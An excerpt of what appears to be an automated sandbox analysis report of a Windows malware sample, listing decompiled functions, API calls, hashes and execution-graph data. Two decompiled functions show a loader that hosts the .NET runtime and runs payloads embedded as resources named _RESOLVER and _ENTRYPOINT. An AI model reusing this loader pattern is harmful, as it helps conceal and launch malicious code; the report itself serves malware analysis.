                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                          • API String ID: 3677997916-4173385793
                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction ID: a813fbf5fdd61ad2e6297c1d03dc0b5dcb1e266bf9714427259c3b0395662638
                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction Fuzzy Hash: 9D018D7A940308B9EB11EF90CD46FEA77ACDB04700F104177B904F65D0E6785A54D79C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                          • API String ID: 3677997916-4173385793
                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction ID: c6bc4c080fc5fa975f8bb2417a4f68ba34bc7cc60baef9af76509d3dfd8a5f6d
                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction Fuzzy Hash: 1F01527A950308BAEB11EB90CD46BEA77ACDB04700F604176BA04F65C0E6B86A54D79D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp, Offset: 022C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_22c0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$@$@$@
                                                                          • API String ID: 0-496764042
                                                                          • Opcode ID: 9200def30268f1cf56faa0117a3e81abe0a1009fd11b6db9c2b073f9f54e804a
                                                                          • Instruction ID: 8c57b35e800ac8d1328f92d698b450aa27ee2b661ab8eb5e3352538070f332ca
                                                                          • Opcode Fuzzy Hash: 9200def30268f1cf56faa0117a3e81abe0a1009fd11b6db9c2b073f9f54e804a
                                                                          • Instruction Fuzzy Hash: 72D1028684E7C14FE313977028692957FB0AE23118F2F55DBC4C9DB0A3E26D994AC367
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID:
                                                                          • API String ID: 730355536-0
                                                                          • Opcode ID: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                          • Instruction ID: d2b02c823ba1647cc84e75737c235603f8a51179c48dc4d6faecaae88e00545b
                                                                          • Opcode Fuzzy Hash: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                          • Instruction Fuzzy Hash: B40184B02043406ED715AF699D0AB1A7BB5F745704F04847FA140BA2E1CBBE54B0CB5F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00406520(void* __eax, struct HICON__* __edx) {
                                                                          				void _v32;
                                                                          				void* _v40;
                                                                          				void* _v48;
                                                                          				void* _v52;
                                                                          				void* _t17;
                                                                          				void* _t20;
                                                                          				struct _ICONINFO* _t23;
                                                                          
                                                                          				_t9 = __eax;
                                                                          				_t20 = __eax;
                                                                          				if(__edx !=  *((intOrPtr*)(__eax + 0x1c))) {
                                                                          					E004064E4(__eax);
                                                                          					_t9 = __edx;
                                                                          					 *((intOrPtr*)(_t20 + 0x1c)) = __edx;
                                                                          					if(__edx != 0) {
                                                                          						GetIconInfo(__edx, _t23);
                                                                          						GetObjectA(_v40, 0x18,  &_v32);
                                                                          						 *(_t20 + 0x18) = _v40;
                                                                          						_t17 = _v52;
                                                                          						if(_t17 != 0) {
                                                                          							DeleteObject(_t17);
                                                                          						}
                                                                          						_t9 = _v48;
                                                                          						if(_t9 != 0) {
                                                                          							return DeleteObject(_t9);
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t9;
                                                                          			}
                                                                          APIs
                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                          • GetIconInfo.USER32(?), ref: 00406540
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                          • DeleteObject.GDI32(?), ref: 00406566
                                                                          • DeleteObject.GDI32(?), ref: 00406574
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                          • String ID:
                                                                          • API String ID: 3133107492-0
                                                                          • Opcode ID: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                          • Instruction ID: 2ae9454a62f4479f67ab2556911db7116a2ee9a23fb28f719fd143bfb6d196f5
                                                                          • Opcode Fuzzy Hash: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                          • Instruction Fuzzy Hash: B9F06DB1A003117BCB00EE7AAC8594B72DC9F44750B02083EB940FB386E638DD6487E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040FF7C: DestroyCursor.USER32(00000000), ref: 0040FF8B
• GetIconInfo.USER32(?), ref: 0040FFD8
• GetObjectA.GDI32(?,00000018,?), ref: 0040FFE9
• DeleteObject.GDI32(?), ref: 0040FFFE
• DeleteObject.GDI32(?), ref: 0041000C
Memory Dump Source
• Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
Yara matches
Similarity
• API ID: Object$Delete$CursorDestroyIconInfo
• String ID:
• API String ID: 3133107492-0
• Opcode ID: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
• Instruction ID: 2d28933f0b2e023a71d2f14a39f9032314a54afd7f494d7512fc5867bd48f6a1
• Opcode Fuzzy Hash: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
• Instruction Fuzzy Hash: 67F06271A043155BCB14EEB99CC1A8B769C9F48754B00482AB850E7342E7B8DC8487E5
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
Yara matches
Similarity
• API ID: DeleteIconInfoObject
• String ID: ,k@
• API String ID: 2689914137-1053005162
• Opcode ID: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
• Instruction ID: 6eb33a66848ac9ac3950d349fa1ce54abc8aaa9849f71adcceb630d577d3c1da
• Opcode Fuzzy Hash: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
• Instruction Fuzzy Hash: B7414C71E0021A9FDF10DF99C881AAEBBB4FF48318F11406AD911B7381D778AD95CBA4
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,Function_00004ADA), ref: 0040E4A1
• SetCurrentDirectoryA.KERNEL32(00000000), ref: 00411368
  • Part of subcall function 0040EAA0: GetTempPathA.KERNEL32(00000105,?,00000000,Function_00005072), ref: 0040EACE
  • Part of subcall function 0040E468: GetCommandLineA.KERNEL32(00000000,Function_00004ADA), ref: 0040E4BB
• ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
Strings
Memory Dump Source
• Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
Yara matches
Similarity
• API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
• String ID: open
• API String ID: 2622400689-2758837156
• Opcode ID: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
• Instruction ID: ca9bbc1aa8f47e6c3f9ee794e5cc2909a51f6400e8153674fcf191bbd04044bb
• Opcode Fuzzy Hash: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
• Instruction Fuzzy Hash: D211ED70F043198EEB10FB79CC81A89B375EF86308F4049B6A008B7191D67E6E858E5A
Uniqueness
• Uniqueness Score: -1.00%

Execution Graph

• Execution Coverage: 18.4%
• Dynamic/Decrypted Code Coverage: 0%
• Signature Coverage: 5.1%
• Total number of Nodes: 884
• Total number of Limit Nodes: 62

Graph

20138->20139 20140 df2e06 _free 69 API calls 20139->20140 20141 df4f08 20140->20141 20142 df2e06 _free 69 API calls 20141->20142 20143 df4f13 20142->20143 20144 df2e06 _free 69 API calls 20143->20144 20145 df4f1e 20144->20145 20146 df2e06 _free 69 API calls 20145->20146 20147 df4f29 20146->20147 20148 df2e06 _free 69 API calls 20147->20148 20149 df4f34 20148->20149 20150 df2e06 _free 69 API calls 20149->20150 20151 df4f3f 20150->20151 20152 df2e06 _free 69 API calls 20151->20152 20153 df4f4a 20152->20153 20154 df2e06 _free 69 API calls 20153->20154 20155 df4f58 20154->20155 20156 df2e06 _free 69 API calls 20155->20156 20157 df4f63 20156->20157 20158 df2e06 _free 69 API calls 20157->20158 20159 df4f6e 20158->20159 20160 df2e06 _free 69 API calls 20159->20160 20161 df4f79 20160->20161 20162 df2e06 _free 69 API calls 20161->20162 20163 df4f84 20162->20163 20164 df2e06 _free 69 API calls 20163->20164 20165 df4f8f 20164->20165 20166 df2e06 _free 69 API calls 20165->20166 20166->19993 20167->19906 20171 df2df1 LeaveCriticalSection 20168->20171 20170 df364f 20170->19885 20171->20170 20173 df365d ___lock_fhandle 20172->20173 20174 df17e3 _CallSETranslator 69 API calls 20173->20174 20175 df3665 20174->20175 20176 df35ac _LocaleUpdate::_LocaleUpdate 71 API calls 20175->20176 20177 df366f 20176->20177 20203 df3349 20177->20203 20180 df2e88 __malloc_crt 69 API calls 20181 df3691 20180->20181 20182 df37c4 ___lock_fhandle 20181->20182 20210 df37ff 20181->20210 20182->19843 20185 df36c7 InterlockedDecrement 20187 df36ef InterlockedIncrement 20185->20187 20188 df36da 20185->20188 20186 df37d4 20186->20182 20190 df37e7 20186->20190 20192 df2e06 _free 69 API calls 20186->20192 20187->20182 20189 df3706 20187->20189 20188->20187 20191 df2e06 _free 69 API calls 20188->20191 20189->20182 20195 df2c8d __lock 69 API calls 20189->20195 20193 df3bbe _free 69 API calls 20190->20193 20194 df36eb 20191->20194 20192->20190 20193->20182 20194->20187 20196 df371a InterlockedDecrement 
20195->20196 20198 df37ab InterlockedIncrement 20196->20198 20199 df3798 20196->20199 20220 df37c9 20198->20220 20199->20198 20201 df2e06 _free 69 API calls 20199->20201 20202 df37aa 20201->20202 20202->20198 20204 df3287 _LocaleUpdate::_LocaleUpdate 79 API calls 20203->20204 20205 df3359 20204->20205 20206 df337a 20205->20206 20207 df3368 GetOEMCP 20205->20207 20208 df337f GetACP 20206->20208 20209 df3391 20206->20209 20207->20209 20208->20209 20209->20180 20209->20182 20211 df3349 getSystemCP 81 API calls 20210->20211 20212 df381c 20211->20212 20215 df3870 IsValidCodePage 20212->20215 20217 df3826 setSBCS 20212->20217 20219 df3895 _memset __setmbcp_nolock 20212->20219 20213 df123c __NMSG_WRITE 6 API calls 20214 df36b8 20213->20214 20214->20185 20214->20186 20216 df3882 GetCPInfo 20215->20216 20215->20217 20216->20217 20216->20219 20217->20213 20223 df341e GetCPInfo 20219->20223 20289 df2df1 LeaveCriticalSection 20220->20289 20222 df37d0 20222->20182 20229 df3456 20223->20229 20232 df3500 20223->20232 20226 df123c __NMSG_WRITE 6 API calls 20228 df35aa 20226->20228 20228->20217 20233 df52d7 20229->20233 20231 df5189 ___crtLCMapStringA 83 API calls 20231->20232 20232->20226 20234 df3287 _LocaleUpdate::_LocaleUpdate 79 API calls 20233->20234 20235 df52e8 20234->20235 20243 df51eb 20235->20243 20238 df5189 20239 df3287 _LocaleUpdate::_LocaleUpdate 79 API calls 20238->20239 20240 df519a 20239->20240 20260 df4fa0 20240->20260 20244 df5205 20243->20244 20245 df5212 MultiByteToWideChar 20243->20245 20244->20245 20247 df523e 20245->20247 20255 df5237 20245->20255 20246 df123c __NMSG_WRITE 6 API calls 20248 df34b7 20246->20248 20249 df4906 std::exception::_Copy_str 69 API calls 20247->20249 20250 df5256 _memset __alloca_probe_16 20247->20250 20248->20238 20249->20250 20251 df5292 MultiByteToWideChar 20250->20251 20250->20255 20252 df52bc 20251->20252 20253 df52ac GetStringTypeW 20251->20253 20256 df51cd 20252->20256 20253->20252 20255->20246 20257 df51e8 20256->20257 20258 
df51d7 20256->20258 20257->20255 20258->20257 20259 df2e06 _free 69 API calls 20258->20259 20259->20257 20262 df4fb9 MultiByteToWideChar 20260->20262 20263 df501f 20262->20263 20273 df5018 20262->20273 20269 df4906 std::exception::_Copy_str 69 API calls 20263->20269 20274 df503c __alloca_probe_16 20263->20274 20264 df123c __NMSG_WRITE 6 API calls 20265 df34d8 20264->20265 20265->20231 20266 df5072 MultiByteToWideChar 20267 df50da 20266->20267 20268 df508b 20266->20268 20271 df51cd __freea 69 API calls 20267->20271 20285 df5462 20268->20285 20269->20274 20271->20273 20272 df509f 20272->20267 20275 df50b6 20272->20275 20277 df50e2 20272->20277 20273->20264 20274->20266 20274->20273 20275->20267 20276 df5462 __crtLCMapStringA_stat LCMapStringW 20275->20276 20276->20267 20278 df4906 std::exception::_Copy_str 69 API calls 20277->20278 20280 df50fd __alloca_probe_16 20277->20280 20278->20280 20279 df5462 __crtLCMapStringA_stat LCMapStringW 20281 df513f 20279->20281 20280->20267 20280->20279 20282 df5167 20281->20282 20284 df5159 WideCharToMultiByte 20281->20284 20283 df51cd __freea 69 API calls 20282->20283 20283->20267 20284->20282 20286 df548d __crtLCMapStringA_stat 20285->20286 20287 df5472 20285->20287 20288 df54a4 LCMapStringW 20286->20288 20287->20272 20288->20272 20289->20222 20291 df4887 20290->20291 20292 df4879 20290->20292 20293 df3bbe _free 69 API calls 20291->20293 20292->20291 20297 df489d 20292->20297 20294 df488e 20293->20294 20295 df3b4f __fclose_nolock 9 API calls 20294->20295 20296 df4898 20295->20296 20296->19479 20297->20296 20298 df3bbe _free 69 API calls 20297->20298 20298->20294 20300 df3e9e EncodePointer 20299->20300 20300->20300 20301 df3eb8 20300->20301 20301->19492 20305 df3d90 20302->20305 20304 df3e91 20304->19494 20306 df3d9c ___lock_fhandle 20305->20306 20313 df1b4d 20306->20313 20312 df3dbf ___lock_fhandle 20312->20304 20314 df2c8d __lock 69 API calls 20313->20314 20315 df1b54 20314->20315 20316 df3dd0 DecodePointer DecodePointer 
20315->20316 20317 df3dad 20316->20317 20318 df3dfd 20316->20318 20327 df3dca 20317->20327 20318->20317 20330 df53b0 20318->20330 20320 df3e60 EncodePointer EncodePointer 20320->20317 20321 df3e0f 20321->20320 20322 df3e34 20321->20322 20337 df2ed1 20321->20337 20322->20317 20324 df2ed1 __realloc_crt 73 API calls 20322->20324 20325 df3e4e EncodePointer 20322->20325 20326 df3e48 20324->20326 20325->20320 20326->20317 20326->20325 20363 df1b56 20327->20363 20331 df53ce HeapSize 20330->20331 20332 df53b9 20330->20332 20331->20321 20333 df3bbe _free 69 API calls 20332->20333 20334 df53be 20333->20334 20335 df3b4f __fclose_nolock 9 API calls 20334->20335 20336 df53c9 20335->20336 20336->20321 20341 df2ed8 20337->20341 20339 df2f17 20339->20322 20340 df2ef8 Sleep 20340->20341 20341->20339 20341->20340 20342 df4998 20341->20342 20343 df49ac 20342->20343 20344 df49a1 20342->20344 20346 df49b4 20343->20346 20351 df49c1 20343->20351 20345 df4906 std::exception::_Copy_str 69 API calls 20344->20345 20348 df49a9 20345->20348 20347 df2e06 _free 69 API calls 20346->20347 20360 df49bc _free 20347->20360 20348->20341 20349 df49f9 20352 df3eba __calloc_impl DecodePointer 20349->20352 20350 df49c9 HeapReAlloc 20350->20351 20350->20360 20351->20349 20351->20350 20354 df4a29 20351->20354 20356 df3eba __calloc_impl DecodePointer 20351->20356 20359 df4a11 20351->20359 20353 df49ff 20352->20353 20355 df3bbe _free 69 API calls 20353->20355 20357 df3bbe _free 69 API calls 20354->20357 20355->20360 20356->20351 20358 df4a2e GetLastError 20357->20358 20358->20360 20361 df3bbe _free 69 API calls 20359->20361 20360->20341 20362 df4a16 GetLastError 20361->20362 20362->20360 20366 df2df1 LeaveCriticalSection 20363->20366 20365 df1b5d 20365->20312 20366->20365 20368 df108b _memmove 20367->20368 20369 df10a6 SafeArrayDestroy 20368->20369 20370 df10ba SafeArrayCreateVector VariantInit VariantInit 20369->20370 20371 df110e VariantClear VariantClear 20370->20371 20371->19506 20373 df1b6b 
___lock_fhandle 20372->20373 20374 df2c8d __lock 62 API calls 20373->20374 20375 df1b72 20374->20375 20376 df1ba0 DecodePointer 20375->20376 20378 df1c2b _doexit 20375->20378 20376->20378 20379 df1bb7 DecodePointer 20376->20379 20392 df1c79 20378->20392 20385 df1bc7 20379->20385 20381 df1c88 ___lock_fhandle 20381->19511 20383 df1bd4 EncodePointer 20383->20385 20384 df1c70 20386 df19e2 _doexit 4 API calls 20384->20386 20385->20378 20385->20383 20387 df1be4 DecodePointer EncodePointer 20385->20387 20388 df1c79 20386->20388 20390 df1bf6 DecodePointer DecodePointer 20387->20390 20389 df1c86 20388->20389 20397 df2df1 LeaveCriticalSection 20388->20397 20389->19511 20390->20385 20393 df1c7f 20392->20393 20394 df1c59 20392->20394 20398 df2df1 LeaveCriticalSection 20393->20398 20394->20381 20396 df2df1 LeaveCriticalSection 20394->20396 20396->20384 20397->20389 20398->20394 20400 df1b5f _doexit 69 API calls 20399->20400 20401 df1a13 20400->20401

Executed Functions

Control-flow Graph

C-Code - Quality: 19%
E00DF1010(struct HINSTANCE__* __ecx, intOrPtr* __edx, WCHAR* _a4) {
	char _v8;
	char _v16;
	char _v24;
	intOrPtr* _v28;
	void* _v32;
	void* _v36;
	char _v56;
	char _v72;
	signed int _t23;
	void* _t28;
	long _t29;
	intOrPtr* _t34;
	void* _t35;
	void* _t46;
	void* _t47;
	intOrPtr* _t51;
	intOrPtr* _t53;
	void* _t60;
	struct HINSTANCE__* _t61;
	long _t62;
	void* _t65;
	struct HRSRC__* _t66;
	intOrPtr* _t68;
	intOrPtr* _t69;
	signed int _t71;

	_t23 =  *0xdff000; // 0xaf6a40da
	 *[fs:0x0] =  &_v16;
	_v28 = __edx;
	_t61 = __ecx;
	_t66 = FindResourceW(__ecx, _a4, L"FILES");
	_t28 = LockResource(LoadResource(_t61, _t66));
	_t29 = SizeofResource(_t61, _t66);
	__imp__#411(0x11, 0, _t29, _t23 ^ _t71, _t60, _t65, _t47,  *[fs:0x0], E00DF8E70, 0xffffffff); // executed
	_t62 = _t29;
	__imp__#23(_t62,  &_v24);
	E00DF5520(_v24, _t28, _t29);
	__imp__#24(_t62);
	_t51 = _v28;
	 *((intOrPtr*)( *_t51 + 0xb4))(_t51, _t62,  &_v32);
	__imp__#16(_t62); // executed
	_t34 = _v32;
	_t35 =  *((intOrPtr*)( *_t34 + 0x40))(_t34,  &_v36);
	__imp__#411(0xc, 0, 0);
	_t68 = __imp__#8;
	 *_t68( &_v56);
	_v8 = 0;
	 *_t68( &_v72);
	_v8 = 1;
	_t53 = _v36;
	asm("movq xmm0, [ebp-0x34]");
	asm("movq [eax], xmm0");
	asm("movq xmm0, [ebp-0x2c]");
	asm("movq [eax+0x8], xmm0"); // executed
	 *((intOrPtr*)( *_t53 + 0x94))(_t53, _t35,  &_v72);
	_t69 = __imp__#9;
	 *_t69( &_v72);
	_t46 =  *_t69( &_v56);
	 *[fs:0x0] = _v16;
	return _t46;
}

APIs
• FindResourceW.KERNEL32(?,?,FILES,AF6A40DA,?,?,00000000), ref: 00DF1046
• LoadResource.KERNEL32(?,00000000,?,?,00000000), ref: 00DF1050
• LockResource.KERNEL32(00000000,?,?,00000000), ref: 00DF1057
• SizeofResource.KERNEL32(?,00000000,?,?,00000000), ref: 00DF1061
• SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 00DF106E
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DF107B
• _memmove.LIBCMT ref: 00DF1086
• SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00DF108F
• SafeArrayDestroy.OLEAUT32(00000000), ref: 00DF10A7
• SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000000), ref: 00DF10C0
• VariantInit.OLEAUT32(?), ref: 00DF10D2
• VariantInit.OLEAUT32(?), ref: 00DF10DF
• VariantClear.OLEAUT32(?), ref: 00DF1118
• VariantClear.OLEAUT32(?), ref: 00DF111E
Strings
Memory Dump Source
• Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
• Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
• Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp
• Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp
• Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp
• Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
• Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
Similarity
• API ID: ArraySafe$ResourceVariant$ClearCreateDataInitVector$AccessDestroyFindLoadLockSizeofUnaccess_memmove
• String ID: Rv$FILES
• API String ID: 2634884361-2067215473
• Opcode ID: 60ab53c8ae259ab124fc5988cad34ef8f559a0cc5789c286c20bc5c410a9aae1
• Instruction ID: 9a5c177477e09a7f60e285b261fd1838e593932272f9db533db1aac0f60639fa
• Opcode Fuzzy Hash: 60ab53c8ae259ab124fc5988cad34ef8f559a0cc5789c286c20bc5c410a9aae1
• Instruction Fuzzy Hash: DD310972D00209BFDB10EBA4DD49FAEBBBCEB89710F108169F905E7250DA756905CBB1
Uniqueness

Uniqueness Score: -1.00%
                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 75 df1140-df116a LoadLibraryW GetProcAddress 76 df116c-df118b 75->76 77 df11c7-df11e2 CorBindToRuntimeEx 75->77 80 df11bf-df11c5 76->80 81 df118d-df11a8 76->81 78 df11e6-df1239 call df1010 * 2 77->78 80->77 80->78 81->80 85 df11aa-df11bb 81->85 85->80
                                                                          C-Code - Quality: 65%
                                                                          			E00DF1140(struct HINSTANCE__* _a4) {
                                                                          				char _v20;
                                                                          				char _v24;
                                                                          				intOrPtr* _v32;
                                                                          				char _v36;
                                                                          				intOrPtr* _v40;
                                                                          				intOrPtr* _v44;
                                                                          				intOrPtr* _v48;
                                                                          				char _v52;
                                                                          				intOrPtr* _v64;
                                                                          				_Unknown_base(*)()* _t24;
                                                                          				intOrPtr* _t28;
                                                                          				intOrPtr* _t30;
                                                                          				void* _t33;
                                                                          				intOrPtr* _t39;
                                                                          				intOrPtr* _t45;
                                                                          				intOrPtr* _t46;
                                                                          
                                                                          				_t24 = GetProcAddress(LoadLibraryW(L"mscoree.dll"), "CLRCreateInstance");
                                                                          				_v24 = 0;
                                                                          				if(_t24 == 0) {
                                                                          					L5:
                                                                          					__imp__CorBindToRuntimeEx(0, 0, 0, 0xdfcd24, 0xdfcd04,  &_v24);
                                                                          					_t39 = _v48;
                                                                          					L6:
                                                                          					 *((intOrPtr*)( *_t39 + 0x28))(_t39);
                                                                          					_t28 = _v52;
                                                                          					 *((intOrPtr*)( *_t28 + 0x34))(_t28,  &_v36);
                                                                          					_t30 = _v44;
                                                                          					 *((intOrPtr*)( *_t30))(_t30, 0xdfcd44,  &_v52);
                                                                          					E00DF1010(_a4, _v64, L"_RESOLVER"); // executed
                                                                          					_t33 = E00DF1010(_a4, _v64, L"_ENTRYPOINT"); // executed
                                                                          					return _t33;
                                                                          				}
                                                                          				_v20 = 0;
                                                                          				 *_t24(0xdfcd14, 0xdfcd54,  &_v20); // executed
                                                                          				_t45 = _v32;
                                                                          				if(_t45 != 0) {
                                                                          					 *((intOrPtr*)( *_t45 + 0xc))(_t45, L"v4.0.30319", 0xdfcd34,  &_v24);
                                                                          					_t46 = _v40;
                                                                          					if(_t46 != 0) {
                                                                          						 *((intOrPtr*)( *_t46 + 0x24))(_t46, 0xdfcd24, 0xdfcd04,  &_v52);
                                                                          					}
                                                                          				}
                                                                          				_t39 = _v36;
                                                                          				if(_t39 != 0) {
                                                                          					goto L6;
                                                                          				} else {
                                                                          					goto L5;
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • LoadLibraryW.KERNEL32(mscoree.dll), ref: 00DF114E
                                                                          • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 00DF115A
                                                                          • CorBindToRuntimeEx.MSCOREE(00000000,00000000,00000000,00DFCD24,00DFCD04,00000000), ref: 00DF11DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp
